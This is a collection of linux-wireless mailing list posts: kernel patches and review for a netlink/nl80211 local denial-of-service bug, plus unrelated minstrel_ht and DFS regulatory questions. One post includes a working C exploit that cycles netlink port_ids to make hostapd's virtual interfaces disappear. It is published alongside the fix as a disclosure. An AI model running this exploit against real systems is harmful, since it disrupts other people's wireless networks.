[PATCH] NETLINK_URELEASE non-bound socket problem
Currently, any non-privileged user can create netlink socket with port_id equal to port_id used by hostapd to create wireless network interfaces on-the-fly when more than one BSS is configured. When such socket is closed, nl80211 will receive socket release notification and such virtual interfaces will be removed while hostapd is still running. This patch introduces two additional checks to correct the problem: 1) Do not send netlink socket release notification when socket is not bound. 2) Check protocol number in nl80211 netlink socket release notification handler. Signed-off-by: Dmitry Ivanov --- net/netlink/af_netlink.c | 2 +- net/wireless/nl80211.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c index 215fc08..330ebd6 100644 --- a/net/netlink/af_netlink.c +++ b/net/netlink/af_netlink.c @@ -688,7 +688,7 @@ static int netlink_release(struct socket *sock) skb_queue_purge(&sk->sk_write_queue); -if (nlk->portid) { +if (nlk->portid && nlk->bound) { struct netlink_notify n = { .net = sock_net(sk), .protocol = sk->sk_protocol, diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c index 98c9242..056a730 100644 --- a/net/wireless/nl80211.c +++ b/net/wireless/nl80211.c @@ -13216,7 +13216,7 @@ static int nl80211_netlink_notify(struct notifier_block * nb, struct wireless_dev *wdev; struct cfg80211_beacon_registration *reg, *tmp; -if (state != NETLINK_URELEASE) +if (state != NETLINK_URELEASE || notify->protocol != NETLINK_GENERIC) return NOTIFY_DONE; rcu_read_lock(); -- 2.1.4 -- To unsubscribe from this list: send the line "unsubscribe linux-wireless" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: NETLINK_URELEASE non-bound socket problem (was: [PATCH] Fix local DoS in cfg80211 subsystem)
Hi Johannes! I will prepare patch which does not send NETLINK_URELEASE for unbound sockets as you suggest. But I think protocol check in nl80211 is still needed because port_id is unique per-protocol. On Tue, Apr 5, 2016 at 12:56 PM, Johannes Berg wrote: > Hi Dmitrijs, > > Thanks for reporting this problem. > >> The patch below corrects this problem in kernel space. > > I don't think that this is correct, there are four more users of > NETLINK_URELEASE (nfnetlink, NFC), and afaict all of them have the same > bug as nl80211. > > Rather than fix all of them, I think we should simply not report > NETLINK_URELEASE for netlink sockets that weren't bound; if any user > comes up that requires them later we could add a new event instead. > > I can't find what commit introduced this code, it goes back before git > history, so I don't have the commit log. Maybe it was done for > nfnetlink log/queue? Certainly both nl80211 and NFC are much newer. > >> Also, it is >> recommended to ensure that user-space applications are not using >> user-supplied port_id for netlink sockets (which is default in >> libnl-tiny for example). > > This I think we should remove from the commit log - it's misleading and > there's no point. > > johannes > -- To unsubscribe from this list: send the line "unsubscribe linux-wireless" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[PATCH] Fix local DoS in cfg80211 subsystem
When hostapd is configured with more than one BSS and daemonized, subsequent call to any tool like "iw" which opens and then closes netlink socket may suddenly remove virtual interfaces created by hostapd (such as wlan0-1). In fact, any non-privileged user can create netlink socket with the same port_id as used by hostapd (port_id is equal to pid before daemonization). Although bind() will fail in that case, nl80211 subsystem will receive notification and remove interfaces. Here is simple exploit: #include #include #include #include #include #include int main() { unsigned int port_id; int sock_fd; int bind_rv; struct sockaddr_nl src_addr; if(!getuid()) { if(setuid(1234)) { perror("Cannot drop root privileges - UID"); return -1; } if(setuid(1234)) { perror("Cannot drop root privileges - GID"); return -1; } } for(port_id = 0; port_id < 65536; port_id++) { sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_GENERIC); if(sock_fd < 0) { return -1; } memset(&src_addr, 0, sizeof(src_addr)); src_addr.nl_family = AF_NETLINK; src_addr.nl_pid = port_id; bind_rv = bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr)); if(bind_rv) { fprintf(stderr, "Bind failed for port_id %i: %s\n", port_id, strerror(errno)); } close(sock_fd); } } The patch below corrects this problem in kernel space. Also, it is recommended to ensure that user-space applications are not using user-supplied port_id for netlink sockets (which is default in libnl-tiny for example). Signed-off-by: Dmitry Ivanov --- include/linux/netlink.h | 1 + net/netlink/af_netlink.c | 1 + net/wireless/nl80211.c | 4 +++- 3 files changed, 5 insertions(+), 1 deletion(-) diff --git a/include/linux/netlink.h b/include/linux/netlink.h index da14ab6..4a13b3c 100644 --- a/include/linux/netlink.h +++ b/include/linux/netlink.h @@ -138,6 +138,7 @@ struct netlink_notify { struct net *net; u32 portid; int protocol; +bool bound; }; struct nlmsghdr * diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c index 215fc08..0640864 100644 --- a/net/netlink/af_netlink.c +++ b/net/netlink/af_netlink.c @@ -693,6 +693,7 @@ static int netlink_release(struct socket *sock) .net = sock_net(sk), .protocol = sk->sk_protocol, .portid = nlk->portid, +.bound = nlk->bound, }; atomic_notifier_call_chain(&netlink_chain, NETLINK_URELEASE, &n); diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c index 98c9242..3099200 100644 --- a/net/wireless/nl80211.c +++ b/net/wireless/nl80211.c @@ -13216,7 +13216,9 @@ static int nl80211_netlink_notify(struct notifier_block * nb, struct wireless_dev *wdev; struct cfg80211_beacon_registration *reg, *tmp; -if (state != NETLINK_URELEASE) +if (state != NETLINK_URELEASE || +notify->protocol != NETLINK_GENERIC || +!notify->bound) return NOTIFY_DONE; rcu_read_lock(); -- 2.1.4 -- To unsubscribe from this list: send the line "unsubscribe linux-wireless" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Regression in minstrel_ht vs minstrel?
Hi! While investigating a case of intermittent extreme packet loss, I've found that minstrel_ht algo has one possible regression compared to non-HT version of minstrel. It does not add lowest rate to the last element of rate table array. Minstrel: /* Use lowest rate last */ ratetbl->rate[i].idx = mi->lowest_rix; ratetbl->rate[i].count = mp->max_retry; ratetbl->rate[i].count_cts = mp->max_retry; ratetbl->rate[i].count_rts = mp->max_retry; Minstrel HT: rates->rate[i].idx = -1; This difference can be easily patched. I have two otherwise identical ath9k-based stations under test for the last two days sitting in the same noisy environment. So far, patched one seems to be more robust. Is this difference an intentional design decision or should I submit the patch? -- To unsubscribe from this list: send the line "unsubscribe linux-wireless" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
DFS region is not set for Australia. Channel 52 and above is unusable.
Hello! In latest regdb, there are four countries which have DFS channels but DFS region is not set: 00 (World regulatory domain) AD (Andorra) AU (Australia) HK (Hong-Kong) For example: country AU: (2402 - 2482 @ 40), (20) (5170 - 5250 @ 80), (17), AUTO-BW (5250 - 5330 @ 80), (24), DFS, AUTO-BW (5490 - 5710 @ 160), (24), DFS (5735 - 5835 @ 80), (30) However, cfg80211 has explicit check for this condition since revision 55f7435c18. Because of this, I cannot use channel 52 and above when country code is set to AU. Hostapd receives error code -EINVAL from the kernel after NL80211_CMD_RADAR_DETECT and aborts initialization sequence. I have a couple of questions regarding this issue: 1) Has anyone else noticed this too? 2) Which of these three components is wrong - regdb, cfg80211 or hostapd? -- To unsubscribe from this list: send the line "unsubscribe linux-wireless" in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html